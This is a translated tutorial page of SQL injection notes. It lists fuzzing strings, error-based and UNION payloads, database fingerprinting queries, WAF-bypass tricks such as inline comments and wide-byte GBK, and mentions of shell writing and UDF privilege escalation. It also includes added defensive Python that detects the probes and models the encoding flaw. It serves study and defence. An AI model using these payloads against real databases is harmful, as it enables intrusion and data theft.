2025-04-13 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article introduces the main knowledge points of SQL injection vulnerabilities in WEB security. Many people have questions about this topic in daily work, so the editor has consulted various sources and organized a simple, practical set of notes; hopefully they answer those questions. Let's learn together!
SQL injection vulnerability
3.1.1. Injection classification
SQL injection is a code injection technique used to attack data-driven applications. When an application does not filter input properly, malicious SQL statements can be inserted through input fields and executed (for example, dumping the database contents to an attacker).
3.1.1.1. Classified by technique
Depending on the technique used, SQL injection can be divided into:
● Blind injection
Boolean-based blind: the truth value of the executed statement can only be inferred from the application's response
Time-based blind: the application gives no explicit echo, so the result can only be judged with a time-delay function
● Error-based injection: the application displays all or part of the database error message
● Stacked injection: some applications allow a ; to be appended so that multiple statements execute in one call
● Other
3.1.1.2. Classified by how data is obtained
In addition, injection can be divided into three categories according to how the data is obtained:
● In-band
Data is obtained directly through the web application; error-based injection, for example, extracts data through the site's response or error feedback.
● Inference
Data is inferred from some reflection of the web application's behaviour, e.g. Boolean blind injection and stacked injection; this is what is commonly called blind injection, where data is inferred from other changes in the web application.
● Out-of-band (OOB)
Data is obtained through other transmission channels, such as DNS resolution and email.
3.1.2. Injection detection
3.1.2.1. Common injection points
● GET/POST/PUT/DELETE parameters
● X-Forwarded-For
● File names
3.1.2.2. Fuzzing injection points
● ' / "
● 1/1
● 1/0
● and 1=1
● " and "1"="1
● and 1=2
● or 1=1
● or 1=
● ' and '1'='1
● + - ^ * % /
● > || | & &&
● ~
● !
● @
● Backtick execution
3.1.2.3. Test constants
● @@version
● @@servername
● @@language
● @@spid
3.1.2.4. Testing the number of columns
For example:
http://www.foo.com/index.asp?id=12+union+select+null,null-- , increasing the number of nulls until nothing is returned.
3.1.2.5. Error-based injection
● select 1/0
● select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a
● extractvalue(1, concat(0x5c,(select user())))
● updatexml(0x3a,concat(1,(select user())),1)
● exp(~(SELECT * from(select user())a))
● ST_LatFromGeoHash((select * from(select * from(select user())a)b))
● GTID_SUBSET(version(), 1)
3.1.2.5.1. Error-based injection using geometry functions
● GeometryCollection((select * from (select * from(select user())a)b))
● polygon((select * from(select * from(select user())a)b))
● multipoint((select * from(select * from(select user())a)b))
● multilinestring((select * from(select * from(select user())a)b))
● LINESTRING((select * from(select * from(select user())a)b))
● multipolygon((select * from(select * from(select user())a)b))
Note that error-based injection using the exp function no longer works in MySQL versions after 5.5.49; see commit 95825f for details.
The geometry-based error injections listed above were fixed in commit 5caea4 and no longer work in later 5.5.x versions.
3.1.2.6. Stacked injection
● ;select 1
3.1.2.7. Comment characters
● #
● --+
● /*xxx*/
● /*! xxx*/
● /*! 50000xxx*/
3.1.2.8. Determining filter rules
● Whether input is truncated
● Whether a character is filtered
● Whether keywords are filtered
Slashes and encoding
3.1.2.9. Obtaining information
● Determine the database type
and exists (select * from msysobjects) > 0 (Access database)
and exists (select * from sysobjects) > 0 (SQL Server database)
● Determine database tables
and exists (select * from admin)
● Version, hostname, username, database name
Tables and fields
Order By Select Into
Table name, column name
3.1.2.10. Testing permissions
● File operations
Read sensitive files
Write a shell
● Out-of-band channels
Network requests
3.1.3. Privilege escalation
3.1.3.1. UDF privilege escalation
UDF (User Defined Function) is a mechanism provided by MySQL: new functions can be added to MySQL by writing a DLL extension.
Once MySQL privileges have been obtained, custom extension files can be uploaded in this way and system commands executed from MySQL.
3.1.4. Determining the database type
3.1.4.1. MySQL
● sleep: sleep(1)
● benchmark: BENCHMARK(5000000, MD5('test'))
● String concatenation
SELECT 'a' 'b'
SELECT CONCAT('some','string')
● Version
SELECT @@version
SELECT version()
● Identification functions
connection_id()
last_insert_id()
row_count()
3.1.4.2. Oracle
● String concatenation
'a'||'oracle' --
SELECT CONCAT('some','string')
● Version
SELECT banner FROM v$version
SELECT banner FROM v$version WHERE rownum=1
3.1.4.3. SQL Server
● WAITFOR: WAITFOR DELAY '00:00:10';
● SERVERNAME: SELECT @@SERVERNAME
● Version: SELECT @@version
● String concatenation
SELECT 'some'+'string'
● Constants
@@pack_received
@@rowcount
3.1.4.4. PostgreSQL
● sleep: pg_sleep(1)
3.1.5. Bypass techniques
● Encoding bypass
Case changes
URL-encoded
HTML encoding
hexadecimal encoding
Unicode encoding
● Comments
// -- -- + -- - # /**/ ;
Inline comments are used more often; they have the special form /*!xxx*/ that only MySQL recognizes.
e.g. index.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3
● When a keyword is filtered only once
union => ununionion
● Replacement with equivalent functionality
● Function replacement
substring / mid / sub
ascii / hex / bin
benchmark / sleep
● Variable substitution
user() / @@user
● Symbols and keywords
and / &
or / |
● HTTP parameters
HTTP parameter pollution
id=1&id=2&id=3: results differ depending on the container
HTTP split injection
● Buffer overflow
Some WAFs written in C handle strings of limited length; payloads beyond a certain length may not be processed.
● Second-order injection: when there is a length limit, it can be bypassed by changing the length of the database field through multi-statement execution
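As an added illustration (not code from the original page), the following Python normalizes request fields the way a detection rule should before matching, undoing the evasions listed in this section (case changes, single and double URL encoding, MySQL inline comments, and the single-pass keyword filter), and runs it over a few constructed request records, including the X-Forwarded-For injection point from 3.1.2.1. The request records, signature names and function names are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed request records for the example: (request line, X-Forwarded-For header value)
SAMPLE_REQUESTS = [
    ("GET /index.php?id=12 HTTP/1.1", "203.0.113.7"),
    ("GET /index.php?id=-1%20/*!UNION*/%20/*!SELECT*/%201,2,3 HTTP/1.1", "203.0.113.8"),
    ("GET /index.php?id=1%2527%2520and%2520%25271%2527%253D%25271 HTTP/1.1", "203.0.113.9"),
    ("GET /index.php?id=1 HTTP/1.1", "1' and sleep(5)-- "),
    ("GET /index.php?id=1+UnUNIONion+SeLECT+null HTTP/1.1", "203.0.113.10"),
]

# Probe signatures drawn from the fuzz and fingerprint lists in 3.1.2; matched on normalized text.
PROBE_PATTERNS = {
    "union_select": r"union.*select",                    # no \b, so "ununionion select" (single-pass filter) still matches
    "tautology": r"\b(and|or)\b\s*['\"]?\d+['\"]?\s*=",  # and 1=1, " and "1"="1, or 1=
    "delay_or_error_func": r"(sleep|benchmark|extractvalue|updatexml)\s*\(",
    "server_constant": r"@@(version|servername|language|spid)",
}

def normalize(value: str) -> str:
    """Canonicalize a request field so that the encoding/comment tricks above hit the same rule."""
    prev = None
    while prev != value:                                  # decode until stable: handles %2527 double encoding
        prev, value = value, unquote_plus(value)
    value = re.sub(r"/\*!(?:\d{5,6})?(.*?)\*/", r" \1 ", value, flags=re.S)  # /*!50000UNION*/ runs as UNION on MySQL
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)  # an ordinary block comment is just whitespace
    return re.sub(r"\s+", " ", value).lower()             # case changes and whitespace padding

def flag_request(request_line: str, xff: str) -> list:
    """Names of probe signatures found in the URL or in X-Forwarded-For (both are injection points)."""
    url = request_line.split(" ")[1] if request_line.count(" ") >= 2 else request_line
    hits = set()
    for field in (url, xff):
        text = normalize(field)
        hits.update(name for name, pat in PROBE_PATTERNS.items() if re.search(pat, text))
    return sorted(hits)

def triage(records):
    """Map each suspicious request line to the signatures it triggered; clean requests are omitted."""
    return {req: flag_request(req, xff) for req, xff in records if flag_request(req, xff)}

if __name__ == "__main__":
    for req, names in triage(SAMPLE_REQUESTS).items():
        print(names, req)
```

Substring matching without word boundaries trades some false positives for resistance to the keyword-doubling trick; such rules are for triage and alerting, while parameterized queries remain the actual fix.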
3.1.6. SQL injection tips
3.1.6.1. Wide-byte injection
When programming with GBK encoding, programmers usually use set names 'gbk', which is equivalent to:
set
character_set_connection = 'gbk',
character_set_results = 'gbk',
character_set_client = 'gbk';
The vulnerability arises because, once set character_set_client = 'gbk'; has been executed, MySQL assumes the data sent by the client is GBK-encoded and decodes it as GBK, while mysql_real_escape runs before that decoding. If set names 'gbk' is used directly, real_escape does not know the encoding of the data it is escaping and simply inserts %5c. When the server then decodes the data, it treats the submitted byte together with %5c as a single GBK character, which creates the vulnerability.
There are three ways to solve this problem. The first is to set the client charset to binary, so that no decoding is performed. The second is mysql_set_charset('gbk'), which stores the encoding information in the database connection, so the problem does not occur. The third is to use PDO.
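To make the failure and the first two fixes concrete, here is an added byte-level model (illustration code, not the original page's or MySQL's source): a charset-unaware escape, the charset-aware escape that mysql_set_charset('gbk') enables, and a simplified model of how the server scans a quoted literal under character_set_client. The function names and the sample input bytes are constructed for the example; PDO prepared statements (the third fix) avoid string escaping entirely and are not modelled.

```python
# Added illustration of the wide-byte problem; simplified model, not MySQL's own code.

def is_gbk_char(buf: bytes, i: int) -> bool:
    """True if buf[i:i+2] is a valid two-byte GBK character (lead 0x81-0xFE, trail 0x40-0xFE except 0x7F)."""
    return (i + 1 < len(buf) and 0x81 <= buf[i] <= 0xFE
            and 0x40 <= buf[i + 1] <= 0xFE and buf[i + 1] != 0x7F)

def escape_unaware(data: bytes) -> bytes:
    """Escaping with no charset knowledge: a backslash before ' \" \\ one byte at a time."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def escape_gbk_aware(data: bytes) -> bytes:
    """Escaping after mysql_set_charset('gbk'): whole GBK characters pass through untouched, and a
    lone byte that merely looks like a GBK lead byte is itself escaped, so it can never pair with
    the backslash inserted in front of the quote that follows it."""
    out, i = bytearray(), 0
    while i < len(data):
        if is_gbk_char(data, i):
            out += data[i:i + 2]
            i += 2
            continue
        b = data[i]
        if 0x81 <= b <= 0xFE or b in b"'\"\\":
            out.append(0x5C)
        out.append(b)
        i += 1
    return bytes(out)

def quote_escapes_literal(body: bytes, client_charset: str) -> bool:
    """Model of the server scanning the inside of a '...' literal under character_set_client.
    Returns True if an unescaped quote ends the literal early, i.e. the escaping failed."""
    multibyte = client_charset == "gbk"      # 'binary' (fix 1) has no multibyte characters
    i = 0
    while i < len(body):
        if multibyte and is_gbk_char(body, i):
            i += 2                           # two bytes consumed as one character
            continue
        if body[i] == 0x5C:
            i += 2                           # a backslash escapes exactly one following byte
            continue
        if body[i] == 0x27:
            return True
        i += 1
    return False

USER_INPUT = b"\xbf'"   # constructed: a lone GBK lead byte followed by a single quote
```

With set names 'gbk' alone, escape_unaware turns the input into bf 5c 27, which the server reads as one GBK character followed by a bare quote; escape_gbk_aware produces 5c bf 5c 27 instead, and a binary client charset leaves the unaware output harmless.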
There are other encoding tricks. For example, latin1 discards invalid Unicode, so admin%32 is not equal to admin in the application code but is equal to admin in the database comparison.
This concludes the study of "What are the knowledge points of SQL injection vulnerabilities in WEB security"; hopefully it has answered everyone's questions. Combining theory with practice helps learning, so go and try it! To keep learning more related knowledge, please continue to follow this website, where the editor will keep working to bring more practical articles.
© 2024 shulou.com SLNews company. All rights reserved.